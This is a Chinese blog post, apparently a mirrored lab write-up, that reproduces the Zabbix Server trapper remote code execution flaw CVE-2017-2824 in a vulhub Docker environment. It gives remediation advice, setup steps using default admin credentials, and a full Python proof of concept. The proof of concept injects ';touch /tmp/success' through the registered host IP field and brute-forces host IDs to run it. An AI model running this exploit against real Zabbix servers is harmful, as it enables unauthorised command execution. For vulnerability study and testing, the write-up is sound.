当前位置:网站首页>Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)
Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)
2022-06-10 18:40:00 【51CTO】
漏洞描述
Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。恶意人员可远程利用该漏洞注入命令,执行代码。
安全等级
- 高危
影响版本
- Zabbix 2.4.7 - 2.4.8r1
修复建议
- 删除Zabbix数据库中的默认脚本条目,数据库操作 SQL为: use zabbix; delete * from scripts;
- 及时安装官方补丁升级
环境搭建
使用vulhub中的漏洞环境进行测试
测试示例
示例一
使用poc进行验证
验证前需要登录到zabbix开启自动注册功能,直接使用poc的话无法验证
访问zabbix登录界面,使用默认账号密码进行登录admin/zabbix
在Configuration-Actions下选择Auto registration,然后Create action

然后设置一个名称,然后选择Operations

选择Add-Add host,选择完成后,点击下方的Add添加后,再点击蓝色的Add,即可创建成功


在该漏洞目录下,提供了该漏洞的利用方法README.md和利用脚本exploit.py

poc如下:
import
sys
import
socket
import
json
import
sys
def
send(
ip,
data):
conn
=
socket.
create_connection((
ip,
10051),
10)
conn.
send(
json.
dumps(
data).
encode())
data
=
conn.
recv(
2048)
conn.
close()
return
data
target
=
sys.
argv[
1]
print(
send(
target, {
"request":
"active checks",
"host":
"vulhub",
"ip":
";touch /tmp/success"}))
for
i
in
range(
10000,
10500):
data
=
send(
target, {
"request":
"command",
"scriptid":
1,
"hostid":
str(
i)})
if
data
and
b'failed'
not
in
data:
print(
'hostid: %d'
%
i)
print(
data)
- 1.
- 2.
- 3.
- 4.
- 5.
- 6.
- 7.
- 8.
- 9.
- 10.
- 11.
- 12.
- 13.
- 14.
- 15.
- 16.
- 17.
- 18.
- 19.
- 20.
- 21.
在poc中的10051为docker中zabbix-server的映射端口
通过docke ps查看映射端口,需根据实际情况更改
目标的ip无需在poc中设置

使用poc进行验证,后面的ip地址为目标ip地址
可能会失败很多次,最后也是通过反复重启镜像后才验证成功的

成功后进入docker的zabbix-server镜像内部
在tmp下找到了创建的success文件

边栏推荐
- New trends and prospects of data center planning and design under the background of "double carbon"
- SAR图像聚焦质量评价插件
- 北京地铁票务系统
- 叮咚抢菜-派送时段监听及推送工具
- 2022.05.25(LC_718_最长重复子数组)
- Openssl1.1.1 VS2013-编译教程
- 面试中经常问到的几个问题,快来看看能答对几道吧
- 【 random talk 】 congratulations on getting the title of CSDN expert. Your efforts will eventually pay off
- 中国 璞富腾酒店及度假村旗下酒店推出全新水疗产品共庆6月11日全球健康日
- 2022.05.26(LC_1143_最长公共子序列)
猜你喜欢

MySQL高级篇第一章(linux下安装MySQL)【上】

My first work: tensorflow2 x

Mysql (17 déclencheurs)

【web】個人主頁web大作業「課錶」「相册」「留言板」

AEC: analysis of echo generation causes and echo cancellation principle

专项测试之「 性能测试」总结

全数字时代,企业IT如何完成转型?

c指针(面试经典题目练习)

Tencent cloud database tdsql- a big guy talks about the past, present and future of basic software

超级简单的课程设计ssm学生管理系统(含源码简单添加、删除、修改、查询操作)
随机推荐
Nodejs basic architecture analysis parsing engine directory plug-in installation core module
Array signal processing simulation part IV -- Z-transform analysis array polynomial
【C语言进阶】指针的进阶【上篇】
Adobe Premiere Basics - introduction, configuration, shortcut keys, creating projects, creating sequences (I)
Domain Driven Design (VI) - Architecture Design
Libcurl 7.61.0 vs2013 compilation tutorial
一文帶你了解J.U.C的FutureTask、Fork/Join框架和BlockingQueue
Longest ascending subsequence (LIS) Logu
New trends and prospects of data center planning and design under the background of "double carbon"
MySQL数据库设计概念(多表查询&事务操作)
Vs solution to garbled Chinese characters read from txt files (super simple)
2022.05.27(LC_647_回文子串)
2022.05.24(LC_674_最长连续递增序列)
MySQL (17 after class exercises)
mysql8.0(新特性小结)
AEC: analysis of echo generation causes and echo cancellation principle
MySQL (17 trigger)
Performance and high availability analysis of database firewall
Monotonic stack structure
【web】個人主頁web大作業「課錶」「相册」「留言板」